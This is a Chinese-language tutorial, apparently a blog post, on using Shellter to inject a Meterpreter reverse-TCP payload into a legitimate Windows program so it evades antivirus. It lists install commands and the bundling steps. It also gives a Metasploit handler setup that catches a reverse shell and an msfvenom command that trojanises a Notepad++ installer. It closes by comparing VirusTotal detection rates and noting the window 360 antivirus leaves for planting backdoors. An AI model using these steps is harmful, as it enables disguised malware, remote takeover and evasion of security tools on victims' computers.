shellter 是一个捆绑工具,采用动态 shellcode 注入 的方式,将 shellcode 注入到其它程序中,达到免杀的效果,躲避杀软的查杀。
# shellter 安装
- 添加 i386 32 位 架构支持、更新 apt、安装 wine 依赖:
dpkg --add-architecture i386 && apt update && apt -y install wine32
- 安装 shellter:
apt install shellter
![image-20230426011840045]()
# shellter 使用
使用 shellter 捆绑 Meterpreter_Reverse_TCP
捆绑步骤:
- 命令行输入
shellter打开工具 - 输入
A或者a,选择 自动模式; PE Target:后输入要进行 捆绑 的 文件路径
![image-20230426011919683]()
<br>- 输入
Y,进入 隐形模式
![image-20230426011923428]()
<br> - 输入
L,使用 payload 攻击模块列表(即上面的 1~7 ) - payload 编号选择
1,使用 Meterpreter_Reverse_TCP 攻击
![image-20230426011927372]()
<br> - 分别输入监听端的 IP、端口号
![image-20230426011931101]()
<br> - 按
[Enter]退出 shellter :
![image-20230426011934700]()
<br>
[关于生成的文件]
捆绑完毕的文件 会代替 原文件 ,即出现在 原文件目录 下,名字相同
而原文件会 备份 在目录/root/Shellter_Backups/:
# 利用 & 免杀效果
# 利用
- 上传到 Win7_x64 虚拟机,
- Kali_Linux 虚拟机打开 msf (命令
msfconsole),监听反弹 shell:use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.158.139set LPORT 4444run
反弹 shell 成功!
# 免杀效果
我的 Win7_x64 虚拟机 安装了 360 全家桶,
但是 静态检测 貌似并没有查出 木马文件~
运行木马程序,并成功获得 meterpreter 的 shell 之后,360 竟然也没有第一时间报毒。。。 什么情况 (⊙_⊙)?
大概一分钟之后,才提示有木马:
(实际上这个时间足够黑客 迁移进程 并 布置后门 了)
当然,如果你的电脑以前中过这个毒,360 会第一时间反应过来
(但这要是还没反应,360 就该进回收站了)
然后看看 virustotal 的检测情况(31 / 70):检测报告 传送门 1
对比 :
使用 同程序 同 payload,用 msf 自带的捆绑手段生成的木马:
(命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.158.139 LPORT=4444 -x npp.8.1.4.Installer.exe -f exe > mp_npp.exe )
virustotal 的检测情况(40 / 70):检测报告 传送门 2
相比较而言,可以说 shellter 的捆绑免杀效果比 msf 好很多了。
